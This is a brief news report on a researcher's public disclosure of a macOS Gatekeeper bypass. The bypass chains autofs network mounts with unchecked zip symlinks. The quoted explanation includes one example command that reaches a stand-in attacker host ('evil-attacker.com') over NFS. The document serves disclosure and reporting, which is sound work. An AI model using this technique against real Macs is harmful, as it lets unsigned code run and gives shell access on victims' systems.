Researcher pulishes macOS Gatekeeper bypass vulnerability

Security researcher Filippo Cavallarin recently discovered a security vulnerability on macOS 10.14.5 that can ignore the first barrier of the system security Gatekeeper to run unsafe applications directly, and thus obtain the system’s shell permissions. Gatekeeper is a key defensive measure in the Mac App Store. When your app is not securely signed, the system cannot run the app. In the system, only apps from the Mac App Store and certified developers can be run by default.

Researcher wrote:

The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just by accessing a “special” path, in this case, any path beginning with “/net/”.
For example
ls /net/evil-attacker.com/sharedfolder/
will make the os read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS.

The second legit feature is that zip archives can contain symbolic links pointing to an arbitrary location (including automount enpoints) and that the software on MacOS that is responsable to decompress zip files do not perform any check on the symlinks before creatig them.

This issue has been submitted to Apple. “This issue was supposed to be addressed, according to the vendor, on May 15th, 2019, but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public.